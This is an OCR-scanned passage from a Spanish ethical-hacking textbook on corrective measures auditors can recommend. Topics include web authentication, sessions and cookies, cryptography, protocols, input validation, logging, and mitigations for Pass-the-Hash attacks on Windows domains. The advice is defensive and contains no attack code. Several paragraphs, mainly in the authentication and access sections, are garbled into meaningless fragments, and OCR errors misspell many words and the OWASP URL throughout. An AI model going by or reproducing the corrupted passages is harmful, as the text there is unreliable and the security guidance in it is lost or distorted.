La  busqueda  del  fallo  y  el  conocimiento  del  remedio  ayudaran  al  auditor  o  equipo  de  auditores  a 
dotar  de  un  cierto  nivel  su  trabajo,  y  proporcionara  mayor  seguridad  a  la  empresa  contratante.  tanto 
en  el  anibito  real  como  en  la  percepcion  de  su  trabajo. 

Es  impoitante  que  el  equipo  de  auditores  se  encuentre  en  continue  contacto  con  la  tecnolouia  y  la 
seguridad.  los  nuevos  agujeros  de  seguridad,  las  nuevas  soluciones  de  seguridad  y  los  probremas  a 
los  que  se  enfrentan,  etcetera. 
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2.  Medidas  correctores  en  auditoria  perimetral 

En  este  apartado  se  proporcionan  diferentes  medidas  coirectoras  y  caracteristicas  quc  se  deberian 
tener  en  cuenta  en  los  sistemas  perimetrales,  los  cuales  estan  expuestos  continuamente  o  gran  parte 
del  tiempo  a  la  conectividad  con  usuarios  en  Internet  En  el  capitulo  anterior  se  estiidio  como  llevar 
a  cabo  la  auditoria  perimetral,  ahora  se  exponen  diferentes  medidas  que  ayudaran  al  auditor  a 
recomendar  soluciones  de  los  posibles  fallos  encontrados  en  el  proceso. 

Las  primeras  contramedidas  o  recomendaciones  que  el  auditor  debe  contar  en  el  informe  son  las 
soluciones  a  las  vulnerabilidades  que  se  ban  podido  encontrar  en  la  propia  auditoria  perimetral.  Es 
cierto  que  existe  una  serie  de  caracteristicas  que  se  deben  tener  en  cuenta,  ya  que  pueden  ayudar  al 
auditor  a  utilizar  un  procedimiento  para  las  recomendaciones.  En  otras  palabras,  las  recomendaciones 
se  pueden  clasificar  de  la  siguiente  manera: 

-  Autenticacion. 

-  Acceso. 

-  Criptografia  y  datos  sensibles. 

Sesiones. 

-  Comunicaciones  y  protocolos. 

-  Entradas,  codificacion  y  errores. 

OWASP  proporciona  una  guia  de  buenas  practicas,  la  cual  es  totalmente  recomendable  de  visualizar 
y  leer  en  algun  momento.  La  guia  se  puede  encontrar  en  la  siguiente  direccion  URL  htlps;/7www. 
owasp.org/index.php/ESAPI_Secure_Coding_Guideline. 


Autenticacion 

La  identificacion  y  autenticacion  de  iisuarios  es  un  proceso  critico  que  debe  disponer  de  unas  medidas 
de  segLiridad,  las  cuales  deben  ser  conocidas  por  los  auditores  para  poder  presentar  contramedidas  en 
la  con'eccion  o  implementacion  de  aplicativos  web.  Los  accesos  a  recursos,  como  paginas  o  ficheros, 
deben  requerir  la  autenticacion  de  los  usuarios,  salvo  que  estos  se  especifiquen  como  publicos. 
Siempre  hay  que  tener  en  cuenta  que  el  acceso  a  datos  de  caracter  personal  se  realiza  con  una  sesion 
de  usuario  identificado  y  aulenticado. 

Cuando  una  aplicacion  realiza  un  cambio  de  credenciales,  este  se  debera  llevar  a  cabo  de  forma 
segiira,  al  igual  que  la  gestion  de  errores.  Por  otro  lado,  toda  accion  de  verificacion,  por  ejemplo  la 
autenticacion,  debera  llevarse  a  cabo  en  el  lado  del  serv-idor.  Esta  sentencia  es  basica,  pero  la  cual  a 
dia  de  hoy  puede  soiprender  en  algunos  entomos. 

Las  credenciales  no  deben  ser  autocompletadas  en  un  fonnulario  ni  mostrarse  en  claro  en  un  campo 
con  type  password.  Ademas,  las  credenciales  deben  disponer  de  politicas  para  forzar  su  cambio  en 
un  periodo  detenninado.  Aqui  se  introducen  los  conceptos  de  vigencia  maxima,  minima  e  historial 
de  credenciales.  Por  supuesto  se  debe  contemplar  que  las  contrasehas  o  credenciales  deben  disponer 
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Jrral  mefot's  ^  Su  longitud  debe 

para  almacenar  las  conlraseiias  en  un  ficlicro^o  rnf  a  “I'l'aar  una  funcioii  /rat/r 

an  algoriuno  d. fa^pa  sS, “ya  „o  n.i,iaa, 

con  d  ,ue  strand  ”121.  ”  m 

una  serie  de  simbolos  a  introducir  con  el  fin  u  consecutivos,  se  pida  al  usuario 

esra  realiaando  I.  auHl  1"'  au.oma.izado  quidn 

Por  ultimo,  una  contraniedida  que  se  suele  utilizar  en  el  sector  de  la  banca  es  In  •  -  > 

reautenticacion  de  usuario  o  nn  -i  .  . ,  ^  utilizacion  de  una 

3S,.  ,n.d,d.  puede  ser  nel, ell rieTllrir 


Acceso 

. . 

confignrar .  implein.n.ar  do  fonna  ,„as  Segura  los  sell"p"e,‘'il::i2  “ 

inslan...  *  “  nrininro  privilegio  posible  en  todo 

minimoprivilegiolibtvll  a^osl  .“"‘"a”’  “  " 

debe  estar  implementada  siemnre  v  Hp  ^  ^  enttada.  La  captura y  gestion  de  excepciones 

*hi,g  hacia  el  exterior.  ^  ^  mostrando  infomiacion  de 
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La  capa  de  acceso  se  impleinentara  de  manera  centralizada  para  proteger  el  acceso  a  cada  tipo 
de  recurso.  Tener  distribuida  la  capa  de  acceso  piiede  desembocar  en  la  generacion  de  fallos  de 
configuracion  o  de  aplicacion  de  perinisos  debido  a  la  propagacion  o  replicacion  que  hay  que  llevar 
de  estos. 


Criptografia  y  datos  sensibles 

La  criptografia  es  una  rama  fundamental  con  la  que  consegiiimos  lograr  confidencialidad  y  proteger 
la  informacion  y  datos  sensibles.  A  continuacion  se  presentaii  conceptos  de  seguridad  utiles  como 
contramedida  y  buenas  practicas. 

Las  funciones  criptograficas  siempre  deberan  estar  implementadas  en  el  lado  del  servidor.  Ademas, 
todos  los  resumenes  o  hashes  que  se  generen  de  una  contraseha  utilizaran  un  salt  con  el  fin  de  lograr 
dificultar  los  ataques  de  fiierza  bruta.  o  en  su  subconjunto  los  de  diccionario. 

Se  deberia  utilizar  una  politica  de  gestion  de  claves  y  prevenir  el  acceso  a  cualquier  clave  maestra  a 
iin  usLiario  no  autorizado.  Como  ejemplo  decir  que  una  clave  maestra  puede  ser  una  contraseha  de 
una  cadena  de  conexion  de  un  servicio  almacenado  en  texto  piano  en  el  disco,  lo  cual  seria  algo  no 
apropiado. 

Los  valores  aleatorios  deberan  ser  creados  por  modulos  criptograficos  que  sigan  algun  estandar. 
De  este  mode  se  pretende  evitar  que  haya  fallos  de  seguridad  basados  en  la  predictibilidad  de  lo 
generado. 

En  algunas  ocasiones  se  debe  eomprobar  que  los  recursos  que  los  usuarios  descargan  deben  estar 
firmados.  Esto  se  puede  requerir  en  cieitos  entornos  criticos,  por  lo  que  se  puede  eomprobar  si 
esto  se  esta  realizando  y  recomendar  su  uso,  como  se  ha  comentado  anteriormente,  si  el  entomo  lo 
requiere. 

Una  de  las  necesidades  de  seguridad  requeridas  por  los  modulos  criptograficos  que  se  utilicen  en  los 
aplicativos  web  es  la  de  que  esten  validados  por  FIPS  140-2  o  un  estandar  similar,  segun  indica  el 
NJST en  los  Estados  Unidos.  Ademas,  se  puede  recomendar  la  existencia  de  un  procedimiento  para 
el  intercambio  y  gestion  de  claves  entre  las  terceras  partes  y  el  aplicativo. 

Una  de  las  recomendaciones  mas  obvias  en  temas  criptograficos  es  que  nunca  se  utilicen  algoritmos 
de  cifrado  implementados  por  el  propio  desaiTollador.  Solo  se  deben  utilizar  cifrados  estandarizados, 
actuales  y  verificados. 

Otra  de  las  recomendaciones  mas  comunes  es  la  de  que  los  procesos  de  autenticaeion  no  deben  enviar 
las  credenciales  en  texto  claro.  Se  deben  utilizar  protocolos  que  proporcionen  una  comunicacion 
segura  e  informar  de  algunas  vulnerabilidades  conocidas  que  existen  para  estos  protocolos,  por  lo 
que  se  debe  utilizar  los  mas  seguros. 

Los  datos  sensibles  tambien  deben  encontrarse  entre  las  recomendaciones  que  el  auditor  debe  tener 
en  cuenta.  Entendiendo  por  dato  sensible  toda  informacion  referente  a  tarjetas  de  credito,  datos  de 
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facturacion  y  financieros,  daios  de  caracter  personal  y  todos  Jos  datos  que,  ademas,  estan  suietos  n 
la  legislacion.  Por  este  hecho  se  debe  tener  en  cuenta  una  serie  de  recomendaciones,  ya  que  en  este 
ultimo  caso,  toda  precaucion  es  poca  porque  no  solo  la  seguridad  de  la  informacion  esta  en  iueso  si 
no  que  la  empresa  se  juega  sanciones  por  incumplimiento  de  legislacion. 

Tecnicas  como  el  cmtofill,  cacheo  de  informacion  sensible  y  autocompletado  en  general,  siempre  aue 
se  trate  de  mfonnacion  sensible  deben  encontrarse  deshabilitadas.  Esto  es  una  recomendacion  basica 
en  el  desamollo  e  implantacion  de  arqiiitecturas  web.  Las  peticiones  deben  realizarse  utilizando 
metodos  POST  y  no  GET,  principalmente  si  muestran  infonnacion  sensible.  Ademas,  debera  ir 
piotegida  por  algoritmos  criptograficos.  Todos  los  datos  sensibles  que  se  envian  al  cliente  deben 
ser  protegidos  de  que  otros  puedan  acceder  a  el  los,  es  decir,  deben  ser  in  validados,  por  ejemplo 
mediante  el  uso  de  cabeceras  no-cache  tras  el  acceso  autorizado. 

Una  de  las  recomendaciones  mas  basicas,  y  que  se  debe  cumplir  siempre  por  cualquier  sistema  de 
informacion  es  que  el  desarrollador  no  debe  embeber  en  el  codigo  fuente  de  la  aplicacion  datos 
sensibles.  Esta  situacion  es  mas  comun  de  lo  que  se  puede  pensar  a  priori,  y  pone  en  peli<no  la 
seguridad  de  todo  el  sistema.  ® 


Sesiones 

En  este  apartado  se  presentan  las  recomendaciones  relacionadas  con  los  fallos  de  seguridad  mas 
comunes  en  el  ambito  de  la  gestion  de  la  sesion.  Una  vez  el  usuario  ha  sido  autenticado  comienza 
una  sesion  donde  el  usuario  tiene  acceso  a  la  zona  intema,  y  esta  sesion  debe  ser  implementada  de 
manera  segura  por  el  equipo  de  desarrollo.  Existen  diferentes  amenazas  que  piieden  hacer  que  una 
incorrecta  implementacion  ponga  en  pcligro  los  datos  del  sistema  de  informacion. 

Las  sestones  del  usuario  son  invalidadas  cuando  e.ste  realiza  un  logon!  de  la  aplicacion.  Este  tipo  de 
control  siempre  debera  estar  implementado  en  una  aplicacion,  si  no  seria  un  fallo  srave  del  diseno 
de  la  propia  aplicacion.  Se  debe  eomprobar  que  este  control  funciona  coirectamente.  Ademas.  este 
control  debera  ser  visible  desde  cualquier  vista  de  la  aplicacion,  ya  que  el  usuario  debe  poder  cerrar 
sesion  en  cualquier  instante  y  desde  cualquier  punto  de  la  aplicacion.  En  algunas  ocasiones  se  puede 
dar  el  easo  de  que  los  usuarios  no  cieiren  la  sesion,  se  debera  implantar  un  control  de  limeou!  para 
cerrar  la  .sesion  automaticamente  ante  la  inactividad  del  usuario. 

El  identificador  de  la  sesion  no  debe  ser  revelado  en  la  direccion  URL  bajo  ninguna  circunstancia 
ni  en  los  mensajes  de  emir  que  se  puedan  producir  en  la  aplicacion.  Solamente  debe  ser  enviado 
utilizando  el  campo  cookie.  Es  desaconsejable  que  las  aplicaciones  utilicen 
en  /  iti)ig.  Ademas,  el  identificador  de  la  sesion  debe  cambiar  y  ser  diferente  en  cada  inicio  de 
sesion,  y  debe  ser  eliminado  en  el  servidor  tras  el  proceso  de  log  out. 

Las  cookies  deberian  tener  un  dominio  y  una  nita  configurada  con  un  valor  restrictivo  para  dicho 
sitio.  En  otras  palabras.  delimitar  a  nivel  de  directorio  o  de  subdominio  el  valor  de  la  cookie,  siempre 
y  cuando  sea  posible.  En  muchos  sitios  se  le  otorga  una  cookie  a  un  usuario  y  con  dicha  cookie  puede 
acceder  a  todos  los  recursos  del  dominio,  donde  quiza  se  podria  delimitar  para  que  haya  una  menor 


200 


Ethical  Hacking:  Teoria  y  prcictica  para  la  reatizacion  de  un  pentesting 


exposicion.  Los  parametros  de  la  cookie  deben  tener  establecidos  comunicacion  segura  a  traves  del 
protocolo  que  sea.  Ademas,  las  cookies  debenan  disponer  de  HTTP  Only  y  Secure  Flag.  HTTP  Only 
pemiite  proteger  las  cookies  de  la  lectura  de  los  scripts^  en  otras  palabras,  un  script  Javascript  no 
podra  leer  o  escribir  dicha  informacion.  Logicamente,  eslo  no  es  la  panacea  y  existen  tecnicas  que 
permiten  saltarse  dicha  proteccion,  pero  siempre  es  iina  capa  mas  de  seguridad.  La  lectura  y  escritura 
de  la  cookie  la  realiza  el  servidor  y  el  navegador  web.  Por  otro  lado,  la  proteccion  Secure  Flag  hace 
que  un  navegador  web  no  envie  una  cookie  por  un  canal  no  seguro,  por  lo  que  si  la  conexion  es 
por  HTTP  la  cookie  no  se  enviara.  Como  se  puede  entender  estas  dos  medidas  de  proteccion  son 
interesantes  y  deberian  ser  implantadas  en  la  gestion  de  cookies. 

Los  tokens  de  sesion  deben  ser  suficientemente  largos  y  aleatorios  para  no  ser  vulnerables  a  ataques. 
Ademas,  los  tokens  deben  ser  validados  en  cada  peticion  en  la  parte  del  servidor  y  regenerados  por 
cada  peticion  o  solicitud  de  accion.  La  aleatoriedad  de  los  tokens  debe  ser  comprobada,  ya  que  un 
token  predecible  podria  pennitir  a  un  atacante  llevar  a  cabo  ciertas  acciones  no  deseadas. 

El  identificador  de  la  sesion  debera  ser  regenerado  despues  de  un  tiempo  maximo  de  sesion,  o 
incluso  una  vez  superado  un  numero  concreto  de  acciones.  Esto  es  algo  que  no  se  suele  llevar  a  cabo 
en  la  practica,  pero  que  en  ciertas  aplicaciones  criticas  si  es  implementado. 


Comunicaciones  y  protocolos 

En  el  presente  apaitado  se  trataran  las  recomendaciones  para  los  protocolos  y  comunicaciones  que 
los  servicios  utilicen  en  la  red.  El  analisis  de  los  protocolos  siempre  sera  importante,  sobre  lodo  los 
que  sean  propios  de  la  aplicacion  o  desconocidos  por  el  auditor.  Las  comunicaciones  son  un  piinto 
debil,  ya  que  un  fallo  en  este  ambito  pondra  en  peligro  loda  la  informacion  que  circula  en  el  canal. 

La  utilizacion  de  protocolos  de  seguridad  en  las  comunicaciones  es  algo  rccomendado  desde  el  primer 
instante.  Aunque  en  algunos  escenarios  no  todo  tiene  que  estar  bajo  un  protocolo  de  seguridad,  si  es 
obligatorio  cuando  se  realizan  las  siguientes  acciones: 

Autenticaciones  de  usuarios. 

Cookies  que  deban  tener  Secure  Flag  hace  indicar  que  la  comunicacion  siempre  debera 
ser  cifrada,  ya  que  si  no  dicha  cookie  no  podra  ser  enviada. 

-  Acciones  criticas  por  parte  del  usuario  como  puede  ser  la  consulta  de  informacion  de 
caracter  personal. 

-  Toda  accion  relacionada  con  la  administracion  a  nivel  global  de  la  aplicacion  debera  ir 
siempre  a  traves  de  una  comunicacion  segura. 

-  Toda  conexion  con  sistemas  extemos,  ya  sean  de  la  propia  organizacion  o  no,  y  que 
lleven  a  cabo  un  intercambio  de  informacion  sensible.  Ademas,  esta  circunstancia  debera  ser 
autenticada,  mediante  el  uso  de  un  certihcado. 

-  Toda  conexion  con  sistemas  extenios  deberan  ser  lanzadas  siempre  con  los  minimos 
privilegios,  cumpliendo  con  este  principio  basico  de  la  seguridad.  Si  el  proceso  fuera  alterado 
0  comprometido,  el  atacante  no  dispondria  de  los  maximos  privilegios. 
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Los  ceitificados  SSL  utilizados  en  servidorcs  deben  estar  finnados  por  una  CA,  autoridades  de 
ceitificacion,  reconocidas.  Hay  que  tener  en  cuenta  el  certificate  pinning.  Logicamente,  se  debc 
comprobar  que  los  ceitificados  no  estan  emitidos  para  otros  dominios,  que  no  estan  caducados,  y  que 
se  puede  verificar  la  identidad  del  sitio  remoto.  En  algunos  casos  la  obtencion  del  certificado  remoto 
se  debera  realizar  mediante  una  via  no  telematica,  dependiendo  de  la  criticidad  de  la  operacion  a 
realizar  o  del  ambito  en  el  que  se  enfoque. 

En  algunas  ocasiones  se  puede  requerir  que  existan  certificados  del  lado  del  cliente,  para  autenticarse 
en  algunos  sei*vicios  y  haciendo  que  este  proceso  sea  mas  seguro. 

La  seguridad  en  los  protocolos  es  algo  totalmente  necesario,  y  para  ello  se  presentan  algunas 
recomendaciones  que  se  pueden  dar  en  una  gran  cantidad  de  escenarios  de  una  auditoria.  En  el 
protocolo  HTTP  se  debe  tener  en  cuenta  las  siguientes  recomendaciones: 

-  Las  redirecciones  no  deben  incluir  datos  sin  validai;  y  esta  validacion  se  debe  realizar  en 
el  lado  del  servidor. 

-  Las  aplicaciones  utilizaran  un  conjunto  minimo  de  metodos,  por  ejemplo  GFTy  POST. 
Hay  que  tener  en  cuenta  que  se  pueden  tener  otros  metodos,  pero  se  configuraran  solo  los 
necesarios. 

-  Las  cabeceras  deben  ser  coherentes  y  se  debe  disponer  de  la  cabecera  que  indica  el  tipo 
de  contenido,  content-type.  Ademas,  se  debe  especificar  el  tipo  de  codificacion,  siendo  esta 
una  segura,  por  ejemplo  L/TF-8.  Las  cabeceras  HTTP  solo  deben  contener  caracteres  ASCII. 


Entradas,  codificacion  y  errores 

En  este  apaitado  se  muestran  las  recomendaciones  relacionas  con  las  validaciones  de  entrada  en  los 
aphcativos  web,  la  codificacion  de  las  entradas  y  salidas  de  datos  y  la  gestion  de  los  eiTores  y  logging 
que  se  debe  realizar  en  cualquier  tipo  de  servicio  o  aplicativo. 

Para  la  validacion  de  entradas  se  propone  las  siguientes  recomendaciones: 

-  La  utilizacion  de  patrones  de  validacion  puede  ser  importante  para  filtrar  las  entradas. 
Cuando  se  validc  la  entrada,  si  el  resultado  no  supera  la  validacion  se  debe  rechazar  la 
entrada.  Esto  se  denomina  sanitizacion  de  la  entrada. 

-  Por  supue.sto  las  validaciones  de  las  entradas  se  realizaran  en  el  lado  del  servidor,  aunque 
pueden  existir  validaciones  en  el  lado  del  cliente,  pero  solo  si  estas  son  redundantes. 

-  Para  evitar  procesos  de  automatizacion  de  entradas,  los  formularios  deberan  disponer 
de  un  captcha.  De  este  modo  se  evitara  el  uso  de  herramientas  que  automaticen  acciones 
extemas  que  pongan  en  peligro  la  seguridad  de  la  aplicacion. 

Las  entradas  deben  disponer  de  un  conjunto  de  caracteres  unico.  Esto  es  importante  para 
evitar  otras  codificaciones  no  seguras,  o  que  la  mezcla  de  ambas  amplien  la  superficie  de 
ataque  o  exposicion. 

U  codificacion  de  las  entradas  y  salidas  presentan  las  siguientes  recomendaciones: 
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-  Los  datos  que  forman  parte  de  las  entradas  y  salidas  estaran  escapados  coiTeclamente. 

-  Los  controles  de  codificacion,  como  se  ha  ido  exponiendo  en  todos  los  apaitados 
anteriores,  deben  ser  implementados  en  el  lado  del  servidor. 

Las  peticiones  que  lleven  datos  utilizaran  consultas  paraiiietrizadas  para  evitar  ataques. 
Todos  los  datos  enviados  mediantes  XA4L^  LDAP  u  otros  tipos  deben  ser  escapados 
convenientemente. 

-  Debe  existir  un  saneamiento  asociado  a  las  posibles  subidas  de  ficheros  por  parte  del 
cliente,  tanto  en  el  formato  como  en  los  permisos  que  estos  tendran  en  el  servidor. 

Por  ultimo  se  exponen  las  recomendaciones  en  lo  referente  a  errores  y  logging: 

-  Tanto  los  servicios  como  los  aplicativos  deben  almacenar  un  registro  de  auditoria,  tambien 
conocido  como  log.  La  informacion  que  se  debe  almacenar  es  variada,  aiinque  se  puede 
resumir  en  actividad  de  los  usuarios  y  eventos  relacionados  con  la  seguridad  del  servicio  o 
aplicacion. 

Los  mensajes  de  error  que  se  generen  no  pueden  incluir  datos  sensibles  que  ayuden  a 
identificar  versiones,  rutas,  datos,  etcetera.  Ademas,  estos  controles  deben  ser  implantados 
en  el  lado  del  servidor. 

-  Es  Lina  buena  practica  utilizar  heiTamienlas  de  analisis  de  logs  que  permitan  realizar 
una  gestion  eficiente  de  la  busqueda  de  eventos  de  seguridad.  Para  Ilevar  a  cabo  este  tipo 
de  acciones  se  puede  utilizar  un  SIEM.  Es  interesante  capturar  eventos  que  contengan 
informacion  como  la  fecha  del  evento,  lipo  de  criticidad,  direccion  IP  que  origina  el  evento, 
descripcion,  etcetera. 


3.  Medidas  correctoras  en  auditoria  interna 

En  el  presente  aparlado  se  exponen  medidas  correctoras  que  pueden  ayudar  a  la  empresa  a  mejorar 
sLi  nivel  de  seguridad  ante  las  pniebas  de  una  auditoria  interna.  Como  se  ha  visto  en  el  libro  la 
configuracion  de  redes,  la  seguridad  de  los  servicios,  la  actualizacion  de  las  versiones,  el  movimienlo 
vertical  y  horizontal,  son  algunos  de  los  problemas  de  seguridad  a  los  que  se  enfrenta  diariamente 
una  empresa  intemamente. 


Medidas  correctoras  para  ataques  PtH 

Como  se  ha  visto  en  este  libro  los  ataques  PtH  o  Pass  The  Hash  permiten  el  robo  de  credenciales,  ya 
sea  mediante  el  uso  de  una  contraseha  obtenida  o  por  el  uso  de  un  hash  robado. 

Como  ya  se  ha  visto,  y  a  modo  de  resumen,  el  atacante  debe  obtener  un  acceso  administrativo  local 
en  un  ordenador  del  ambito  de  la  empresa.  Posteriormente,  el  atacante  tratara  de  aumentar  el  acceso 
a  otros  equipos  de  la  propia  red  mediante  el  uso  de  credenciales  robadas.  Las  credenciales  que 
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pueden  obtener  son  otras  que  se  encuentren  logueadas  en  el  quipo,  cacheadas  o  en  el  archivo  SAM. 
Por  otro  lado  se  puede  reutilizar  credenciales  robadas  para  acceder  a  otros  sistemas  o  servicios. 

Si  la  cuenta  coinprometida  es  una  cuenta  con  privilegios,  como  un  administrador  de  dominio.  las 
ganancias  por  parte  del  atacante  son  infinitas,  ya  que  tendn'a  acceso  a  todo  el  dominio  y  ser  cualquier 
Lisuario  del  dominio.  Hay  que  tener  muy  en  cuenta  que  cualquier  credencial  almacenada  en  un 
equipo  puede  ser  robada  con  este  tipo  de  ataque,  incluyendo  las  cuentas  locales  de  los  usuarios 
cuentas  de  usuario  de  dominio,  de  servicio  y  de  equipo.  Las  cuentas  de  dominio  que  no  se 
hayan  utilizado  para  iniciar  sesion  en  el  equipo  comprometido  no  podran  ser  robadas,  a  no  ser  que 
nos  encontremos  en  el  Domain  Controller. 

i.Que  condiciones  se  tienen  que  dar  para  que  un  atacante  pueda  utilizar  un  lia.'ih  robado  en  otro 
equipo?  Se  pueden  enumerar  de  la  siguiente  fonna: 

-  El  atacante  debe  tener  conectividad  con  el  equipo  remoto  a  traves  de  la  red.  y  el  equipo 
remoto  debe  tener  servicios  que  acepten  conexiones  de  red. 

-  La  cuenta  del  usuario  debe  tener  un  lia.ih  identico  al  que  se  robo  en  la  maquina 
coinprometida,  es  decir,  la  contrasena  debe  ser  la  misma.  Por  ejemplo,  si  ambos  equipos 
estan  en  el  mismo  dominio  o  cuentas  locales  con  el  mismo  nombre  de  usuario  y  contrasena. 

La  cuenta  coinprometida  debe  tener  derecho  de  inicio  de  sesion  en  la  red  en  el  equipo 
remoto. 

t,Se  puede  resolver  eslo?  (.Por  que  Microsoft  no  puede  liberar  una  actualizacion  y  resolver  este 
“probleina"?  ^Se  debe  reconstruir  la  arquitectura  de  Windows  para  solventar  esto?  En  primer  lugar, 
no  seria  coriecto  definirlo  como  problema,  quiza  si  es  un  problema  para  los  administradores  de  la 
red  que  utilizan  demasiado  la  delegacion  de  identidades,  entre  otras  medidas,  y  por  ello  se  enfrentan 
al  peligro  del  pass  the  hash. 

En  segundo  lugar  el  robo  de  credenciales  y  la  reutilizacion  o  impersonalizacion  de  credenciales  no 
es  un  problema  que  se  pueda  resolver  con  una  actualizacion  de  software  por  parte  de  Microsoft. 

Por  lo  tanto,  para  que  la  mitigacion  sea  efectiva,  cualquier  cambio  en  la  arquitectura  de  Windows 
debe  denegar  a  los  potenciales  atacantes  la  posibilidad  de  realizar  acciones  como; 

-  ^Donde  sc  almacenan  en  memoria  las  credenciales?  Muchos  usuarios  llevan  anos 
investigando  sobre  este  tema,  y  conocen  las  partes  mas  internas  del  sistema  operative  Windows, 
por  lo  que  a  priori  se  conoce  en  que  direcciones  se  alinacena  diclia  informacion.  <,C6ino  se 
soluciona  esto?  Quiza  se  puede  pensar  en  tecnicas  de  cifrado,  ocultacion,  ofuscacion,  pero  la 
realidad  nos  indica  que  en  el  momento  que  el  producto  esta  en  manos  del  usuario,  siempre 
podra  Ilevar  a  cabo  ingenieria  inversa.  Un  ejemplo  claro  de  esto  son  las  investigaciones 
llevadas  a  cabo  poi  Herndn  Ochoa  o  Oeniil  Kiwi,  y  los  resultados  obtenidos,  como  son 
las  herramientas  WCE  o  Mimikatz,  respect! vamente.  Estas  investigaciones  dejaron  claro  que 
la  seguridad  por  oscuridad  nunca  ha  sido  un  buen  metodo,  ya  que  gracias  a  la  ingenieria 
inversa,  se  puede  obtener  cosas  realmente  interesantes. 
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-  Extraccion  de  credenciales  por  parte  de  los  atacanles.  Gracias  a  P//7y  otro  tipo  de  ataques 
que  pueden  finalizar  en  robo  o  adquisicion  de  credenciales,  un  atacante  aprovecha  el  acceso 
para  compronieter  otras  cuentas  que  pueden  alojarse  en  ese  equipo,  ya  sea  en  meinoria, 
cacheadas  o  en  ficheros.  ^,No  esta  cifrada  esa  informacion?  ^Por  que  hdicrosoft  no  cambia  la 
via  en  que  tbrtifica  esta  informacion?  Realmente  la  informacion  no  esta  en  piano,  pero  casi, 
ya  que  en  algunos  sitios  como  el  proceso  lsass.exe,  la  infomiacion  se  encuentra  cacheada. 
Es  cierto  que  Microsoft  puede  cambiar  esto,  pero  siempre  el  sistema  operative  tendra  la 
capacidad  de  recuperarlos,  por  lo  que  un  atacante  que  estudie  el  funcionamiento  del  sistema 
tendra  la  posibilidad  de  lograr  descubrir  como  funciona.  Microsoft  entiende  que  cambiar  esto 
hace  que  sea  solo  cuestion  de  tiempo  que  un  atacante  vuelva  a  eonocer  como  recuperar  la 
informacion,  siempre  y  cuando  pueda  ejecutar  codigo  como  administrador  en  la  maquina, 
que  logicamente,  en  su  equipo  lo  podra  realizar.  Microsoft  entiende  que  un  paso  importante 
para  la  mitigacion  de  este  hecho  es  evitar  de  algun  modo  que  los  atacantes  puedan  hacerse 
con  el  control  de  las  cuentas,  mediante  la  restriccion  de  acceso  admin istrativo  local.  Esta 
reduccion  se  encuentra  disponible  en  los  sistemas  operativos  de  la  marca  a  dia  de  hoy. 

-  Reutilizar  las  credenciales.  El  famoso  mecanismo  SSO,  Single  Sign-On,  proporciona  una 
mejor  experiencia  de  usuario,  pero  hay  que  asumir  que  aumenta  el  riesgo  de  ataques  PtH,  ya 
que  obteniendo  dicho  hash  o  credencial  se  obticne  acceso  a  todos  los  recursos  de  ese  usuario 
en  distintos  entornos.  Ademas,  como  el  sistema  operative  debe  cachear  las  credenciales  para 
poder  llevar  acciones  despues  en  el  nombre  de  ese  usuario,  este  es  un  riesgo  claro.  Realmente 
esto  se  hace  por  comodidad  del  usuario,  ya  que  si  las  credenciales  no  se  encontrasen  cacheadas, 
el  usuario  deberia  volver  a  escribirlas  continuamente  en  cada  accion  que  realizara. 

Tras  esta  exposicion  de  ideas  y  problemas  sobre  la  arquitectura  de  Windows  y  el  Pass  The  Hash,  se 
puede  llegar  a  la  conclusion  de  que  no  seria  sencillo  alcanzar  una  solucion,  sin  tirar  abajo  todo  el 
ni'icleo  y  volverlo  a  rehacer.  ^Como  se  puede  proteger  una  organizacion? 

Una  organizacion  puede  preparar  distintas  vias  estrategicas  para  llevar  a  cabo  el  proceso  de  mitigacion 
de  los  ataques  PtH.  Se  debe  tener  claro  cual  es  el  objetivo  y  es  prevenir  tanto  los  movimientos 
horizontales  o  laterales  del  atacante,  como  la  escalada  de  privilegios,  es  decir,  el  movimiento  vertical. 
Para  conseguir  esto,  se  debe  disminuir  el  impacto  de  un  robo  de  credenciales  y  su  reutilizacion  ilicita 
en  equipos  con  sistemas  Windows. 

A  continuacion  se  exponen  iinas  recoinendaciones,  que  no  tienen  requisites  previos  importantes, 
aunque  no  son  sencillas  de  implantan  en  un  dominio,  segun  el  punto  de  vista  de  la  empresa  de 
Redmond. 

Restriccion  y  proteccion  de  las  cuentas  privilegias  del  dominio.  Sencillamente  no  utilizar 
la  cuenta  de  administrador  de  dominio  en  equipos  de  usuarios  o  servidores  no  importantes, 

0  no  llevar  a  cabo  esta  accion  si  no  es  estrictamente  necesario.  Con  esta  accion  se  evita  el 
movimiento  vertical,  ya  que  si  dicha  credencial  cae  en  manos  inoportunas  se  proporciona  una 
escalada  de  privilegios  enorme. 

Restriccion  y  proteccion  de  las  cuentas  locales  que  disponen  de  privilegios  administrativos. 
Se  intenta  fortalecer  la  politica  contra  el  movimiento  lateral  u  horizontal. 
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-  Restriccion  del  trafieo  de  entrada  mediante  firewall.  De  niievo,  esta  accion  fortalece  la 
politica  de  seguridad  contra  el  movimiento  horizontal. 

La  implantacion  de  estas  tres  mitigaciones  no  sera  tarea  sencilla,  al  menos  en  dos  de  ellas,  porqtie 
existe  un  esflierzo  importante  para  implantar  tanto  la  restriccion  de  cuentas  privilegiadas  end 
dominio,  como  la  restriccion  de  trafieo  entrante.  El  auditor  debe  valorar  que  las  tres  mitigaciones 
son  eficientes  en  su  objetivo,  y  el  trabajo  del  auditor  sera  de  informal-  y  recomendar,  una  vez  llevada 
a  cabo  la  auditoria,  este  tipo  de  acciones.  Existen  otros  tipos  de  recomendaciones  muy  interesantes 
y  que  son  totalmente  complementarias  a  las  comentadas  anteriormente. 

-  Eliminar  usuarios  estandar  del  grupo  de  administradores.  Se  intenta  restringir  la  escalada 
de  privilegios. 

-  Limitar  el  niimero  y  uso  de  las  cuentas  privilegiadas  en  un  dominio.  Otra  capa  mas  para 
evitar  la  escalada  de  privilegios. 

-  Configuracion  de  un  proxy  para  denegar  la  salida  a  Internet  de  cuentas  privilegiadas.  Esta 
es  otra  capa  para  evitar  la  escalada  de  privilegios. 

-  Asegurar  que  las  cuentas  administrativas  no  disponen  de  cuentas  de  e-mail. 

Utilizar  heiTamientas  de  gestibn  que  no  coloquen  las  credenciales  en  la  memoria  del 
equipo  remote.  Con  esto  se  intenta  evitar  la  escalada  de  privilegios,  ya  que  un  usuario  podrla 
capturar  las  credenciales  en  su  memoria. 

Evitar  los  inicios  de  sesion  en  los  equipos  menos  seguros,  es  decir,  que  puedan  scr 
comprometidos  en  el  futuro.  En  otras  palabras,  que  los  usuarios  no  accedan  de  manera  remota 
a  estos  equipos,  ya  que  sus  credenciales  quedaran  cacheadas.  Solo  el  usuario  necesario 
deberia  ejecutar  en  este  tipo  de  maquinas. 

